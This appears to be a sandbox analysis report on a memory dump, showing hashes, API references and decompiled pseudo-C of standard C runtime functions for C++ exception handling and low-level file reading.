Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD908
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD91A

_free.LIBCMT ref: 6E1DD541

Part of subcall function 6E1D1BE4: HeapFree.KERNEL32(00000000,00000000,?,6E1DDFED,?,00000000,?,?,?,6E1DE2F1,?,00000007,?,?,6E1DD69F,?), ref: 6E1D1BFA
Part of subcall function 6E1D1BE4: GetLastError.KERNEL32(?,?,6E1DDFED,?,00000000,?,?,?,6E1DE2F1,?,00000007,?,?,6E1DD69F,?,?), ref: 6E1D1C0C

_free.LIBCMT ref: 6E1DD563
_free.LIBCMT ref: 6E1DD578
_free.LIBCMT ref: 6E1DD583
_free.LIBCMT ref: 6E1DD5A5
_free.LIBCMT ref: 6E1DD5B8
_free.LIBCMT ref: 6E1DD5C6
_free.LIBCMT ref: 6E1DD5D1
_free.LIBCMT ref: 6E1DD609
_free.LIBCMT ref: 6E1DD610
_free.LIBCMT ref: 6E1DD62D
_free.LIBCMT ref: 6E1DD645

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 1b444a255f3ad571a2232bf86c541bdcaa64eb6311f5b011bff83433bd5c1146
Instruction ID: ed384918be04345ea7fd07833a854b2df2e40a7c4904b23ae768b1ab89107797
Opcode Fuzzy Hash: 1b444a255f3ad571a2232bf86c541bdcaa64eb6311f5b011bff83433bd5c1146
Instruction Fuzzy Hash: 95314E71608605AFEB618AF8D840B8673F8FF10318F204A1AE069D7151EF75E9C8EF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AE57F, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E6E1AE57F(signed int __ecx, signed int __edx, void* __fp0, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, char _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				signed int* _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				void* _v72;
				char _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v104;
				void _v108;
				intOrPtr* _v116;
				signed char* _v188;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t203;
				void* _t204;
				signed int _t205;
				char _t206;
				signed int _t208;
				signed int _t210;
				signed char* _t211;
				signed int _t212;
				signed int _t213;
				signed int _t217;
				void* _t220;
				signed char* _t223;
				void* _t225;
				void* _t226;
				signed char _t230;
				signed int _t231;
				void* _t233;
				signed int _t234;
				void* _t237;
				void* _t240;
				signed char _t247;
				intOrPtr* _t252;
				void* _t255;
				signed int* _t257;
				signed int _t258;
				intOrPtr _t259;
				signed int _t260;
				void* _t265;
				void* _t270;
				void* _t271;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				intOrPtr _t298;
				signed int _t300;
				signed int _t303;
				signed char* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t308;
				signed char* _t311;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t333;
				void* _t335;
				void* _t337;
				void* _t338;
				void* _t339;
				void* _t340;
				void* _t361;

				_t361 = __fp0;
				_t303 = __edx;
				_t279 = __ecx;
				_push(_t322);
				_t308 = _a20;
				_v32 = 0;
				_v5 = 0;
				_t203 = E6E1B5E2B(_a8, _a16, _t308);
				_t338 = _t337 + 0xc;
				_v16 = _t203;
				if(_t203 < 0xffffffff || _t203 >= _t308[1]) {
					L69:
					_t204 = E6E1C4D58(_t274, _t279, _t303, _t308, _t322, _t361);
					asm("int3");
					_t335 = _t338;
					_t339 = _t338 - 0x38;
					_push(_t274);
					_t275 = _v116;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t204;
					} else {
						_push(_t322);
						_push(_t308);
						_t205 = E6E1AE203(_t275, _t279, _t303, _t308, _t322, _t361);
						__eflags =  *(_t205 + 8);
						if( *(_t205 + 8) != 0) {
							__imp__EncodePointer(0);
							_t322 = _t205;
							_t225 = E6E1AE203(_t275, _t279, _t303, 0, _t322, _t361);
							__eflags =  *((intOrPtr*)(_t225 + 8)) - _t322;
							if( *((intOrPtr*)(_t225 + 8)) != _t322) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t217 = E6E1AAA7F(_t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t339 = _t339 + 0x1c;
										__eflags = _t217;
										if(_t217 != 0) {
											L86:
											return _t217;
										}
									}
								}
							}
						}
						_t206 = _a16;
						_v28 = _t206;
						_v24 = 0;
						__eflags =  *(_t206 + 0xc);
						if( *(_t206 + 0xc) > 0) {
							_push(_a24);
							E6E1AA9B1(_t275, _t279, 0, _t322, _t361,  &_v44,  &_v28, _a20, _a12, _t206);
							_t305 = _v40;
							_t340 = _t339 + 0x18;
							_t217 = _v44;
							_v20 = _t217;
							_v12 = _t305;
							__eflags = _t305 - _v32;
							if(_t305 >= _v32) {
								goto L86;
							}
							_t281 = _t305 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t220 = memcpy( &_v64,  *((intOrPtr*)( *_t217 + 0x10)) + _t281, _t282 << 2);
								_t340 = _t340 + 0xc;
								__eflags = _v64 - _t220;
								if(_v64 > _t220) {
									goto L85;
								}
								__eflags = _t220 - _v60;
								if(_t220 > _v60) {
									goto L85;
								}
								_t223 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t223[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L83:
									__eflags =  *_t223 & 0x00000040;
									if(( *_t223 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6E1AE4FF(_t305, _t361, _t275, _a4, _a8, _a12, _a16, _t223, 0,  &_v64, _a24, _a28);
										_t305 = _v12;
										_t340 = _t340 + 0x30;
									}
									goto L85;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L85;
								}
								goto L83;
								L85:
								_t305 = _t305 + 1;
								_t217 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t305;
								_v16 = _t281;
								__eflags = _t305 - _v32;
							} while (_t305 < _v32);
							goto L86;
						}
						E6E1C4D58(_t275, _t279, _t303, 0, _t322, _t361);
						asm("int3");
						_push(_t335);
						_t304 = _v188;
						_push(_t275);
						_push(_t322);
						_push(0);
						_t208 = _t304[4];
						__eflags = _t208;
						if(_t208 == 0) {
							L111:
							_t210 = 1;
							__eflags = 1;
						} else {
							_t280 = _t208 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L111;
							} else {
								__eflags =  *_t304 & 0x00000080;
								_t311 = _v0;
								if(( *_t304 & 0x00000080) == 0) {
									L93:
									_t276 = _t311[4];
									_t324 = 0;
									__eflags = _t208 - _t276;
									if(_t208 == _t276) {
										L103:
										__eflags =  *_t311 & 0x00000002;
										if(( *_t311 & 0x00000002) == 0) {
											L105:
											_t211 = _a4;
											__eflags =  *_t211 & 0x00000001;
											if(( *_t211 & 0x00000001) == 0) {
												L107:
												__eflags =  *_t211 & 0x00000002;
												if(( *_t211 & 0x00000002) == 0) {
													L109:
													_t324 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t304 & 0x00000002;
													if(( *_t304 & 0x00000002) != 0) {
														goto L109;
													}
												}
											} else {
												__eflags =  *_t304 & 0x00000001;
												if(( *_t304 & 0x00000001) != 0) {
													goto L107;
												}
											}
										} else {
											__eflags =  *_t304 & 0x00000008;
											if(( *_t304 & 0x00000008) != 0) {
												goto L105;
											}
										}
										_t210 = _t324;
									} else {
										_t187 = _t276 + 8; // 0x6e
										_t212 = _t187;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t212;
											if(_t277 !=  *_t212) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L99:
												_t213 = _t324;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t212 + 1));
												if(_t278 !=  *((intOrPtr*)(_t212 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t212 = _t212 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L99;
													}
												}
											}
											L101:
											__eflags = _t213;
											if(_t213 == 0) {
												goto L103;
											} else {
												_t210 = 0;
											}
											goto L112;
										}
										asm("sbb eax, eax");
										_t213 = _t212 | 0x00000001;
										__eflags = _t213;
										goto L101;
									}
								} else {
									__eflags =  *_t311 & 0x00000010;
									if(( *_t311 & 0x00000010) != 0) {
										goto L111;
									} else {
										goto L93;
									}
								}
							}
						}
						L112:
						return _t210;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						_t322 = 0;
						__eflags = 0;
						goto L24;
					} else {
						_t322 = 0;
						if(_t274[0x1c] != 0) {
							L24:
							_t279 = _a12;
							_v12 = _t279;
							goto L26;
						} else {
							_t226 = E6E1AE203(_t274, _t279, _t303, _t308, 0, _t361);
							if( *((intOrPtr*)(_t226 + 0x10)) == 0) {
								L63:
								return _t226;
							} else {
								_t274 =  *(E6E1AE203(_t274, _t279, _t303, _t308, 0, _t361) + 0x10);
								_t265 = E6E1AE203(_t274, _t279, _t303, _t308, 0, _t361);
								_v32 = 1;
								_v12 =  *((intOrPtr*)(_t265 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t322) {
									goto L69;
								} else {
									if( *((intOrPtr*)(E6E1AE203(_t274, _t279, _t303, _t308, _t322, _t361) + 0x1c)) == _t322) {
										L25:
										_t279 = _v12;
										_t203 = _v16;
										L26:
										_v56 = _t308;
										_v52 = _t322;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L59:
											__eflags = _t308[3] - _t322;
											if(_t308[3] <= _t322) {
												goto L62;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L69;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t203);
													_push(_t308);
													_push(_a16);
													_push(_t279);
													_push(_a8);
													_push(_t274);
													L70();
													_t338 = _t338 + 0x20;
													goto L62;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L59;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L31:
													__eflags = _t308[3] - _t322;
													if(_t308[3] > _t322) {
														_push(_a28);
														E6E1AA9B1(_t274, _t279, _t308, _t322, _t361,  &_v72,  &_v56, _t203, _a16, _t308);
														_t303 = _v68;
														_t338 = _t338 + 0x18;
														_t252 = _v72;
														_v48 = _t252;
														_v20 = _t303;
														__eflags = _t303 - _v60;
														if(_t303 < _v60) {
															_t294 = _t303 * 0x14;
															__eflags = _t294;
															_v36 = _t294;
															do {
																_t295 = 5;
																_t255 = memcpy( &_v108,  *((intOrPtr*)( *_t252 + 0x10)) + _t294, _t295 << 2);
																_t338 = _t338 + 0xc;
																__eflags = _v108 - _t255;
																if(_v108 <= _t255) {
																	__eflags = _t255 - _v104;
																	if(_t255 <= _v104) {
																		_t298 = 0;
																		_v24 = 0;
																		__eflags = _v96;
																		if(_v96 != 0) {
																			_t257 =  *(_t274[0x1c] + 0xc);
																			_t306 =  *_t257;
																			_t258 =  &(_t257[1]);
																			__eflags = _t258;
																			_v40 = _t258;
																			_t259 = _v92;
																			_v44 = _t306;
																			_v28 = _t259;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t321 = _v40;
																				_t333 = _t306;
																				__eflags = _t333;
																				if(_t333 <= 0) {
																					goto L42;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t260 =  &_v88;
																						_push( *_t321);
																						_push(_t260);
																						L89();
																						_t338 = _t338 + 0xc;
																						__eflags = _t260;
																						if(_t260 != 0) {
																							break;
																						}
																						_t333 = _t333 - 1;
																						_t321 = _t321 + 4;
																						__eflags = _t333;
																						if(_t333 > 0) {
																							continue;
																						} else {
																							_t298 = _v24;
																							_t259 = _v28;
																							_t306 = _v44;
																							goto L42;
																						}
																						goto L45;
																					}
																					_push(_a24);
																					_v5 = 1;
																					_push(_v32);
																					E6E1AE4FF(_t306, _t361, _t274, _a8, _v12, _a16, _a20,  &_v88,  *_t321,  &_v108, _a28, _a32);
																					_t338 = _t338 + 0x30;
																				}
																				L45:
																				_t303 = _v20;
																				goto L46;
																				L42:
																				_t298 = _t298 + 1;
																				_t259 = _t259 + 0x10;
																				_v24 = _t298;
																				_v28 = _t259;
																				__eflags = _t298 - _v96;
																			} while (_t298 != _v96);
																			goto L45;
																		}
																	}
																}
																L46:
																_t303 = _t303 + 1;
																_t252 = _v48;
																_t294 = _v36 + 0x14;
																_v20 = _t303;
																_v36 = _t294;
																__eflags = _t303 - _v60;
															} while (_t303 < _v60);
															_t308 = _a20;
															_t322 = 0;
															__eflags = 0;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6E1ADB27(__eflags);
														_t279 = _t274;
													}
													__eflags = _v5;
													if(_v5 != 0) {
														L62:
														_t226 = E6E1AE203(_t274, _t279, _t303, _t308, _t322, _t361);
														__eflags =  *((intOrPtr*)(_t226 + 0x1c)) - _t322;
														if( *((intOrPtr*)(_t226 + 0x1c)) != _t322) {
															goto L69;
														} else {
															goto L63;
														}
													} else {
														__eflags = ( *_t308 & 0x1fffffff) - 0x19930521;
														if(( *_t308 & 0x1fffffff) < 0x19930521) {
															goto L62;
														} else {
															__eflags = _t308[7];
															if(_t308[7] != 0) {
																L55:
																_t230 = _t308[8] >> 2;
																__eflags = _t230 & 0x00000001;
																if((_t230 & 0x00000001) == 0) {
																	_push(_t308[7]);
																	_t231 = E6E1AF04A(_t361, _t274);
																	_pop(_t279);
																	__eflags = _t231;
																	if(_t231 == 0) {
																		goto L66;
																	} else {
																		goto L62;
																	}
																} else {
																	 *(E6E1AE203(_t274, _t279, _t303, _t308, _t322, _t361) + 0x10) = _t274;
																	_t240 = E6E1AE203(_t274, _t279, _t303, _t308, _t322, _t361);
																	_t290 = _v12;
																	 *((intOrPtr*)(_t240 + 0x14)) = _v12;
																	goto L64;
																}
															} else {
																_t247 = _t308[8] >> 2;
																__eflags = _t247 & 0x00000001;
																if((_t247 & 0x00000001) == 0) {
																	goto L62;
																} else {
																	__eflags = _a28;
																	if(_a28 != 0) {
																		goto L62;
																	} else {
																		goto L55;
																	}
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L31;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L59;
														} else {
															goto L31;
														}
													}
												}
											}
										}
									} else {
										_v20 =  *((intOrPtr*)(E6E1AE203(_t274, _t279, _t303, _t308, _t322, _t361) + 0x1c));
										_t270 = E6E1AE203(_t274, _t279, _t303, _t308, _t322, _t361);
										_push(_v20);
										 *(_t270 + 0x1c) = _t322;
										_t271 = E6E1AF04A(_t361, _t274);
										_pop(_t290);
										if(_t271 != 0) {
											goto L25;
										} else {
											_t308 = _v20;
											_t359 =  *_t308 - _t322;
											if( *_t308 <= _t322) {
												L64:
												E6E1CEE20(_t274, _t290, _t303, _t308, __eflags, _t361);
											} else {
												_t300 = _t322;
												_v20 = _t322;
												while(E6E1AEC58( *((intOrPtr*)(_t300 + _t308[1] + 4)), _t359, 0x6e22086c) == 0) {
													_t322 = _t322 + 1;
													_t290 = _v20 + 0x10;
													_v20 = _v20 + 0x10;
													_t359 = _t322 -  *_t308;
													if(_t322 >=  *_t308) {
														goto L64;
													} else {
														continue;
													}
													goto L65;
												}
											}
											L65:
											_push(1);
											_push(_t274);
											E6E1ADB27(__eflags);
											_t279 =  &_v68;
											E6E1AEC2D( &_v68);
											E6E1ADABB( &_v68, 0x6e216984);
											L66:
											 *(E6E1AE203(_t274, _t279, _t303, _t308, _t322, _t361) + 0x10) = _t274;
											_t233 = E6E1AE203(_t274, _t279, _t303, _t308, _t322, _t361);
											_t279 = _v12;
											 *(_t233 + 0x14) = _v12;
											_t234 = _a32;
											__eflags = _t234;
											if(_t234 == 0) {
												_t234 = _a8;
											}
											E6E1AAB95(_t279, _t234, _t274);
											E6E1AEF3F(_a8, _a16, _t308);
											_t237 = E6E1AF16A(_t308);
											_t338 = _t338 + 0x10;
											_push(_t237);
											E6E1AEEB6(_t274, _t279, _t303, _t308, _t322, _t361);
											goto L69;
										}
									}
								}
							}
						}
					}
				}
			}

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6E1AE67A
type_info::operator==.LIBVCRUNTIME ref: 6E1AE6A1
___TypeMatch.LIBVCRUNTIME ref: 6E1AE7AD
CatchIt.LIBVCRUNTIME ref: 6E1AE802
IsInExceptionSpec.LIBVCRUNTIME ref: 6E1AE888
_UnwindNestedFrames.LIBCMT ref: 6E1AE90F
CallUnexpected.LIBVCRUNTIME ref: 6E1AE92A

Strings

csm, xrefs: 6E1AE627
csm, xrefs: 6E1AE6D8
csm, xrefs: 6E1AE5BA

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: c1d947b39435c41912c6adcc9a45dff5c2088ea00bbacaef1d39d409bcc1ae01
Instruction ID: 66ea7e30fdb3a49434b6b2e142b886b9bc8c12557450d240f581851ce11d953e
Opcode Fuzzy Hash: c1d947b39435c41912c6adcc9a45dff5c2088ea00bbacaef1d39d409bcc1ae01
Instruction Fuzzy Hash: 32C16879C002099FCF15CFE8C8809AEBBB9BF14314F10485AEA256B255C731DAD1EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D748A, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6E1D748A(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E6E1C23E1(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E6E1C23F4( *_t137))) = 9;
						L60:
						_t139 = E6E1C22C2();
						goto L61;
					}
					__eflags = _t198 -  *0x6e222290; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x6e222090 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E6E1C23E1(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E6E1C23F4(__eflags))) = 0x16;
								E6E1C22C2();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E6E1D1C1E(_t154);
								E6E1D1BE4(0);
								E6E1D1BE4(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E6E1D7BFB(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x6e222090 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x6e222090 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x6e222090 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x6e222090 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x6e222090 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x6e222090 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x6e222090 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E6E1E2886(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E6E1C23BE(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E6E1C23F4(__eflags))) = 9;
											 *(E6E1C23E1(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x6e222090 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E6E1D6F6F();
												} else {
													_t170 = E6E1D72FB();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E6E1D71A4(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x6e222090 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t108 =  &_v28; // 0xa
									_t174 = GetConsoleMode( *_t108,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E6E1C23F4(__eflags))) = 0xc;
									 *(E6E1C23E1(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E6E1D1BE4(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x6e222090 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E6E1C23E1(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E6E1C23F4(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E6E1C23E1(_t246)) =  *_t197 & 0x00000000;
					_t139 = E6E1C23F4(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

Strings

, xrefs: 6E1D7712

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 6ef844aac5446da5503d0e4e546885856194be83d3454612bff35d05634fbf67
Instruction ID: c408524eb839dbce3bacbda85d8342d76dbbf3dc9bc9cca2dc85c5dacf4e751e
Opcode Fuzzy Hash: 6ef844aac5446da5503d0e4e546885856194be83d3454612bff35d05634fbf67
